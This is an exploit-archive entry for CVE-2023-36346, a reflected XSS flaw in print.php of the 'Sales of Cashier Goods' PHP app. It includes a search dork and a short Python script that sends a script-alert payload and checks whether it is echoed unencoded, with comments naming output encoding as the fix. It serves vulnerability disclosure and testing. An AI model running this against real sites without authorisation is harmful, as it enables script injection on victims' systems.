## https://sploitus.com/exploit?id=PACKETSTORM:173280
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)  
# Date: 2023-06-23  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : webapps  
# Dork : /print.php?nm_member=  
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html  
# Tested on: Windows/Linux  
# CVE : CVE-2023-36346  
  
import requests  
import urllib.parse  
  
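# Reflected-XSS check for the `nm_member` parameter of print.php
# (CVE-2023-36346). Point `url` only at an instance you are authorised to
# test, e.g. to confirm the issue before patching or to verify a fix.
url = "http://example.com/print.php"

# Raw marker string. It is deliberately NOT pre-encoded: requests
# percent-encodes `params` values itself, so running urllib.parse.quote()
# over it first double-encodes the value. The server would then decode it to
# the literal text "%3Cscript%3E..." rather than markup, and the check would
# report nothing even on a vulnerable install.
payload = "<script>alert('XSS')</script>"

# Build the request parameters
params = {
    "nm_member": payload,
}

# Send the request; the timeout keeps the check from hanging indefinitely
# on an unresponsive host.
response = requests.get(url, params=params, timeout=10)
print(response.text)

# The parameter is affected only if the marker comes back byte-for-byte.
# An HTML-escaped echo (&lt;script&gt;...) means output encoding is applied,
# which is the fix to look for on the server side (e.g. htmlspecialchars()
# around the echoed value in the PHP template).
if payload in response.text:
    print("[!] nm_member is reflected without HTML encoding")
else:
    print("[+] marker not reflected verbatim (escaped, filtered, or absent)")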